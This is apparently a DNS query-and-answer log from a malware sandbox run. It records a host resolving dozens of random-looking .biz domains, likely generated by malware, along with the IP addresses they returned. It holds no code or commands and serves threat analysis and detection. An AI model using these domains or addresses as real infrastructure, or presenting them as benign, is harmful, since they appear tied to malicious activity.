                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:01.360688925 CET192.168.2.81.1.1.10x824bStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.211487055 CET192.168.2.81.1.1.10x6daaStandard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:02.430663109 CET192.168.2.81.1.1.10xc284Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.088689089 CET192.168.2.81.1.1.10xb527Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.889435053 CET192.168.2.81.1.1.10x7c4aStandard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:03.946604967 CET192.168.2.81.1.1.10x67bcStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.747503042 CET192.168.2.81.1.1.10x83ceStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:04.844434977 CET192.168.2.81.1.1.10x4902Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.441349030 CET192.168.2.81.1.1.10x82b1Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:05.705645084 CET192.168.2.81.1.1.10x224cStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.280689001 CET192.168.2.81.1.1.10xdf4aStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:06.521934032 CET192.168.2.81.1.1.10x8df0Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:07.267570019 CET192.168.2.81.1.1.10x940fStandard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.043463945 CET192.168.2.81.1.1.10x1dadStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.167680025 CET192.168.2.81.1.1.10xb646Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:08.919982910 CET192.168.2.81.1.1.10x5d67Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:09.856669903 CET192.168.2.81.1.1.10xe8ecStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.624634981 CET192.168.2.81.1.1.10x3a0cStandard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.711035967 CET192.168.2.81.1.1.10xca4cStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:10.737159967 CET192.168.2.81.1.1.10xca4cStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:11.874113083 CET192.168.2.81.1.1.10x393cStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:12.394541979 CET192.168.2.81.1.1.10x7393Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:12.672070026 CET192.168.2.81.1.1.10x3b9cStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:13.244613886 CET192.168.2.81.1.1.10x9582Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:13.256553888 CET192.168.2.81.1.1.10xc1eeStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.187050104 CET192.168.2.81.1.1.10x4080Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.195643902 CET192.168.2.81.1.1.10x3805Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:14.749418974 CET192.168.2.81.1.1.10x1fe6Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.034600019 CET192.168.2.81.1.1.10x2c28Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.745897055 CET192.168.2.81.1.1.10x79fbStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:15.884335041 CET192.168.2.81.1.1.10x685eStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.212599039 CET192.168.2.81.1.1.10x90c2Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:17.344928980 CET192.168.2.81.1.1.10x22bfStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.671703100 CET192.168.2.81.1.1.10x402aStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:18.793114901 CET192.168.2.81.1.1.10x5ceStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.357824087 CET192.168.2.81.1.1.10xb91bStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:27:19.633423090 CET192.168.2.81.1.1.10xbb6bStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.217353106 CET1.1.1.1192.168.2.80x7ba7No error (0)chichometextiles.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:16.217353106 CET1.1.1.1192.168.2.80x7ba7No error (0)chichometextiles.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:22.893552065 CET1.1.1.1192.168.2.80x45f5No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:24.073482990 CET1.1.1.1192.168.2.80x17ddNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:25.750786066 CET1.1.1.1192.168.2.80x4470No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:26.809123993 CET1.1.1.1192.168.2.80x8d29No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:27.129494905 CET1.1.1.1192.168.2.80xf7d8No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.536638021 CET1.1.1.1192.168.2.80x54f6No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.550873041 CET1.1.1.1192.168.2.80x4971No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:28.550873041 CET1.1.1.1192.168.2.80x4971No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.931081057 CET1.1.1.1192.168.2.80xf425Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:29.939425945 CET1.1.1.1192.168.2.80xccdaNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:30.099896908 CET1.1.1.1192.168.2.80x6c48No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.081044912 CET1.1.1.1192.168.2.80xea00No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.953557968 CET1.1.1.1192.168.2.80x207aNo error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:31.953557968 CET1.1.1.1192.168.2.80x207aNo error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.535139084 CET1.1.1.1192.168.2.80xcbc5Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.543133974 CET1.1.1.1192.168.2.80xee4aName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:32.954092026 CET1.1.1.1192.168.2.80x23d3No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.413685083 CET1.1.1.1192.168.2.80xd392Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:34.441114902 CET1.1.1.1192.168.2.80x942No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.165719986 CET1.1.1.1192.168.2.80xe6b4Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.173973083 CET1.1.1.1192.168.2.80x5d38Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:37.189805984 CET1.1.1.1192.168.2.80x220No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:39.046597004 CET1.1.1.1192.168.2.80xee6dNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.051074982 CET1.1.1.1192.168.2.80xb78eNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:47.275680065 CET1.1.1.1192.168.2.80xc81No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:48.584577084 CET1.1.1.1192.168.2.80x4ab8No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.050651073 CET1.1.1.1192.168.2.80x5cb4No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:50.800462961 CET1.1.1.1192.168.2.80x4618No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.662981033 CET1.1.1.1192.168.2.80x5e17No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:52.662981033 CET1.1.1.1192.168.2.80x5e17No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:54.284370899 CET1.1.1.1192.168.2.80x3ff7No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:55.299175024 CET1.1.1.1192.168.2.80x64daNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.002926111 CET1.1.1.1192.168.2.80x5938No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:56.857687950 CET1.1.1.1192.168.2.80x3c08No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:58.333060980 CET1.1.1.1192.168.2.80xe0b4No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.056732893 CET1.1.1.1192.168.2.80x56b8No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:23:59.435003996 CET1.1.1.1192.168.2.80xe6d1No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.061053038 CET1.1.1.1192.168.2.80x2b6aNo error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:00.977813005 CET1.1.1.1192.168.2.80x515dNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.220237970 CET1.1.1.1192.168.2.80xfac5No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.922668934 CET1.1.1.1192.168.2.80x7516No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:01.922668934 CET1.1.1.1192.168.2.80x7516No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.724911928 CET1.1.1.1192.168.2.80xcfa0No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.878860950 CET1.1.1.1192.168.2.80x7a1fNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.938910007 CET1.1.1.1192.168.2.80x57ceNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.940131903 CET1.1.1.1192.168.2.80xf0d3No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.787480116 CET1.1.1.1192.168.2.80x2890No error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.546628952 CET1.1.1.1192.168.2.80xc696No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.546628952 CET1.1.1.1192.168.2.80xc696No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.651745081 CET1.1.1.1192.168.2.80x985fNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.528116941 CET1.1.1.1192.168.2.80x79baNo error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:07.163049936 CET1.1.1.1192.168.2.80x4fefNo error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.343043089 CET1.1.1.1192.168.2.80xac08No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:08.517411947 CET1.1.1.1192.168.2.80x612No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.174134016 CET1.1.1.1192.168.2.80x8e9aNo error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.269578934 CET1.1.1.1192.168.2.80xcb45No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:09.982058048 CET1.1.1.1192.168.2.80x5a0dNo error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:10.178637981 CET1.1.1.1192.168.2.80x469fNo error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:11.884512901 CET1.1.1.1192.168.2.80x3b96No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.603766918 CET1.1.1.1192.168.2.80xbc64No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:12.763186932 CET1.1.1.1192.168.2.80xeca1No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.745704889 CET1.1.1.1192.168.2.80x70cdNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:13.949990988 CET1.1.1.1192.168.2.80xd3b6No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:14.527496099 CET1.1.1.1192.168.2.80x89c8No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:15.215928078 CET1.1.1.1192.168.2.80x7ed6No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.770576954 CET1.1.1.1192.168.2.80xcf36No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.846013069 CET1.1.1.1192.168.2.80x7ce2No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:16.846013069 CET1.1.1.1192.168.2.80x7ce2No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.035068035 CET1.1.1.1192.168.2.80x9b38No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:18.320338964 CET1.1.1.1192.168.2.80xa0e9No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.186481953 CET1.1.1.1192.168.2.80xb50eNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:19.952234983 CET1.1.1.1192.168.2.80x5c18No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:20.454413891 CET1.1.1.1192.168.2.80x342eNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.411300898 CET1.1.1.1192.168.2.80xe11fNo error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:21.466083050 CET1.1.1.1192.168.2.80x3f21No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:22.363343954 CET1.1.1.1192.168.2.80x5872No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.132112026 CET1.1.1.1192.168.2.80x5399No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:23.999073029 CET1.1.1.1192.168.2.80x25b1No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.079984903 CET1.1.1.1192.168.2.80x53d7No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.699776888 CET1.1.1.1192.168.2.80xc6e3No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:24.923546076 CET1.1.1.1192.168.2.80x918dNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.588027954 CET1.1.1.1192.168.2.80xac57No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:25.736718893 CET1.1.1.1192.168.2.80x5432No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:26.596513987 CET1.1.1.1192.168.2.80x5473No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.411453009 CET1.1.1.1192.168.2.80xabe4No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:27.979592085 CET1.1.1.1192.168.2.80xa228No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:28.430248022 CET1.1.1.1192.168.2.80xf41dNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.237128973 CET1.1.1.1192.168.2.80x56fdNo error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:29.655685902 CET1.1.1.1192.168.2.80xa987No error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:30.548228979 CET1.1.1.1192.168.2.80xeb97No error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:31.187403917 CET1.1.1.1192.168.2.80x1bd0No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.609018087 CET1.1.1.1192.168.2.80x3d0No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.785809040 CET1.1.1.1192.168.2.80xf9d7No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.345720053 CET1.1.1.1192.168.2.80xae7fNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.228034973 CET1.1.1.1192.168.2.80xd106No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.830248117 CET1.1.1.1192.168.2.80x44No error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.848195076 CET1.1.1.1192.168.2.80x522cNo error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.311336994 CET1.1.1.1192.168.2.80xc473No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.981630087 CET1.1.1.1192.168.2.80x6e08No error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.981801987 CET1.1.1.1192.168.2.80xb6ceNo error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.015953064 CET1.1.1.1192.168.2.80x4142No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.481019974 CET1.1.1.1192.168.2.80x9221No error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.907574892 CET1.1.1.1192.168.2.80x6238No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:40.222064018 CET1.1.1.1192.168.2.80x7e68No error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.078264952 CET1.1.1.1192.168.2.80x22e4No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.114361048 CET1.1.1.1192.168.2.80xc5eeNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:41.860805035 CET1.1.1.1192.168.2.80x2b7fNo error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:42.291096926 CET1.1.1.1192.168.2.80x7f8No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
